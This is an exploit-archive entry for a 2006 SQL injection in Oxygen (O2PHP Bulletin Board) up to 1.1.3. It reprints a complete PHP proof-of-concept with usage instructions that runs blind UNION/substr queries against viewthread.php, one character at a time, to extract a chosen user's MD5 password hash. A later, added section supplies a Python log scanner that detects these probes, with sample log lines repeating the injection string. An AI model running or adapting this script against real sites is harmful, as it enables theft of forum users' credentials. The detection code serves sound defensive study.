Vendor: Bulletin Board
By: DarkFig
CVSS: 6,5 (MEDIUM)
Type: SQL Injection
CWE: 89
Product Name: Bulletin Board
Affected Version From: Oxygen <= 1.1.3
Affected Version To: Oxygen <= 1.1.3
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Oxygen <= 1.1.3 (O2PHP Bulletin Board) SQL Injection

A vulnerability in Oxygen <= 1.1.3 (O2PHP Bulletin Board) allows an attacker to inject arbitrary SQL commands via the 'viewthread.php' script. An attacker can use this to manipulate SQL queries, e.g. by injecting arbitrary 'uid' values, and thereby disclose the MD5 hash of a user's password.

Mitigation:

N/A

Exploit-DB raw data:

#!/usr/bin/php
<?

if($argc<4){
 print("
 -------------------------------------------------------
 Affected.scr..: Oxygen <= 1.1.3 (O2PHP Bulletin Board)
 Poc.ID........: 14061118
 Type..........: SQL Injection
 Risk.level....: Medium
 Conditions....: register_globals = on
 Src.download..: download.o2php.com
 Poc.link......: acid-root.new.fr/poc/14061118.txt
 Credits.......: DarkFig
 Note..........: FOR EDUCATIONAL PURPOSE ONLY
 -------------------------------------------------------
 Usage.........: php 14061118.txt <host> <path> <userid>
 -------------------------------------------------------\n");
 exit(1);
}

print "\n Please be patient (max=736 hits)...\n MD5: ";
$host = !preg_match("/^http:\/\/(\S*)/",$argv[1],$hwttp) ? $argv[1] : $hwttp[1];
$path = $argv[2];
$usid = intval($argv[3]);
$tabl = "o2_members";

for($x=1;  $x<=32; $x++) {
for($y=48; $y<=71; $y++) {

$recv  = '';
$sqli  = "%20UNION%20SELECT%201,1%20FROM%20".$tabl."%20WHERE%20uid=".$usid."%20AND%20substr(password,".$x.",1)=char(".$y.")%23";
$data  = "GET ".$path."viewthread.php?tid=1&pid=-1".$sqli." HTTP/1.1 \r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";

if(!$sock  = @fsockopen($host, 80)) die("Connection problem\n");
fputs($sock, $data);

while(!feof($sock)) $recv .= fgets($sock);
fclose($sock);

if(preg_match("/Location: viewthread.php/", $recv)) {
  print strtolower(chr($y));
  break;
} elseif($y == 71) {
  print "Not vulnerable\n";
  exit(1);

}}}

print "\n";
exit(0);

?>

# milw0rm.com [2006-11-18]
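
One way to spot this PoC's traffic in web server logs, added here as an example (not part of the original advisory or exploit): it flags viewthread.php requests whose tid or pid is not a plain integer and records which password offsets were probed. The combined-log format, the sample lines, the rule that legitimate tid/pid values are non-negative integers, and the function name scan are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache combined-log style (not real traffic); the
# query string is the one the PoC above sends, with offset/char code varied.
_PROBE = ('198.51.100.7 - - [18/Nov/2006:10:00:0{n} +0000] "GET /forum/viewthread.php'
          '?tid=1&pid=-1%20UNION%20SELECT%201,1%20FROM%20o2_members%20WHERE%20uid=1'
          '%20AND%20substr(password,{pos},1)=char({code})%23 HTTP/1.1" 200 0')
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [18/Nov/2006:10:00:00 +0000] '
    '"GET /forum/viewthread.php?tid=12&pid=340 HTTP/1.1" 200 8123',
    _PROBE.format(n=1, pos=1, code=48),
    _PROBE.format(n=2, pos=1, code=49),
    _PROBE.format(n=3, pos=2, code=48),
])

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
PROBE_RE = re.compile(r"substr\(\s*password\s*,\s*(\d+)\s*,\s*1\s*\)", re.I)
INT_PARAMS = ("tid", "pid")  # assumption: always non-negative integers when legitimate


def scan(log_text):
    """Return {client_ip: {"hits": n, "positions": [password offsets probed]}}."""
    report = defaultdict(lambda: {"hits": 0, "positions": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/viewthread.php"):
            continue
        # parse_qsl percent-decodes, so %20 and %23 become ' ' and '#'
        params = parse_qsl(url.query, keep_blank_values=True)
        bad = [v for k, v in params
               if k in INT_PARAMS and not re.fullmatch(r"[0-9]+", v)]
        if not bad:
            continue
        report[ip]["hits"] += 1
        for value in bad:
            report[ip]["positions"].update(int(p) for p in PROBE_RE.findall(value))
    return {ip: {"hits": e["hits"], "positions": sorted(e["positions"])}
            for ip, e in report.items()}
```

A client with hundreds of flagged hits and offsets running from 1 to 32 matches the loop behind the PoC's "max=736 hits" message.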